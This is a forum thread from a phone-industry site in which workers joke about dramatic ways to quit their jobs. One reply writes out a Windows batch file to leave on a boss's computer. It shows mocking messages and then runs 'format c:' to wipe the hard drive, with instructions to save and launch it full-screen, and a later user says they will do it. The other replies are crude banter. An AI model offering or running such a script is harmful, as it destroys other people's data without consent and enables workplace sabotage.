Home  ›  Forums  ›

Shop Talk

all discussions

show all 12 replies

The way I want to quit

charliegirl

Feb 1, 2008, 11:50 AM
When it's extremely busy and I am by myself, I want to just walk out and leave a post it on my supervisor's monitor saying "I QUIT!"
M15TER P1NK

Feb 1, 2008, 12:29 PM
go into notepad on your boss' computer... type the following

@echo off
C:
cls
echo This is Charlie... I quit...
pause
echo Before i go i wanted to leave you with a going away present...
pause
echo The next time you press a key all the information on your hard drive will be erased... this is inevetable...
pause
format c:
cls
echo have a nice day 🙂

save the documnet as "whatever you want".bat the .bat is the important part. once you have it saved open the batch file you created and press alt + enter to make it full screen.

if you arent familliar with cmd prompt programming this will actually clear his computer of everything... if you want to be less mean replace "format c:" with "dir /s" and repeat it about 300 times... it...
(continues)
charliegirl

Feb 1, 2008, 12:43 PM
🤣 with our horrendous system it would probably delete everyone in the office too! 😈
damack

Nov 25, 2009, 11:26 AM
🤣 🤣 im gonna do that 😈
Dj Podmaster

Feb 1, 2008, 9:00 PM
I want to get a really angry custy, somebody who's just flippin out and look them in the face and say "Sir I don't really give a s*** and for the love of all humanity have a tictac" and walk out.
charliegirl

Feb 2, 2008, 10:05 AM
🤣 🤣 I don't face my customers I just get to deal with them on the phone. (thankfully) But I get more annoyed usually with my co-workers 🤣
BigShowJB

Feb 2, 2008, 4:33 PM
I had someone do something similar, he waited until about 15 minutes after I left the mall and then sentan email to the boss saying he quit and left his shirt hanging on an accessory rack in the kiosk. he waited that long because he knew that's about how long it would take me to get to the bank and grocery store ad start shopping.

I just about went to fid him and punch him in the throat and nuts.

because who does the boss call to cover the store for the rest of his shift? 😁 👿 👿 👿
simmeon

Nov 25, 2009, 1:10 PM
Ive always wanted to win the lottery then keep getting menial jobs just so I can quit on a weekly or monthly basis. And Im talking all out quitting scene. Like Jerry Maguire only not gay
VZWjny

Nov 25, 2009, 1:33 PM
I want to pack my crack with extra crunchy peanut butter, reach down scoop out a handful and smack a customer or supervisor in the face with it. Then tell them i've had enough of their sh*t.

🤤
GotoGirl

Nov 25, 2009, 6:15 PM
Well, i guess if your going to go out in style minuswell go all the way.. 🤣
VZWjny

Nov 25, 2009, 6:58 PM
I heard the from the movie Blow 😎 I would deffinately still try it though 🤭
Your real Dad

Nov 25, 2009, 6:33 PM
I actually laughed outloud
dopeygirl

Nov 25, 2009, 6:50 PM
I have no ideal way in which I would like to leave this esteemed establishment (enter sarcasm here), but I do have a way in which I would like to leave my mark on my last day. I plan to finish every sentence with "B**** A**". For example...

ME> Thank you for calling *****, B**** A**. My name is Jane Doe B**** A**. Can I get your first and last name B**** A**.

Think anyone will notice????? 😁 😁 😁

You must log in to reply.

Please log in to report a message to the moderator.

all discussions

Subscribe to Phone Scoop News with RSS Follow @phonescoop on Threads Follow @phonescoop on Mastodon Phone Scoop on Facebook Follow on Instagram

Playwire

All content Copyright 2001-2024 Phone Factor, LLC. All Rights Reserved.
Content on this site may not be copied or republished without formal permission.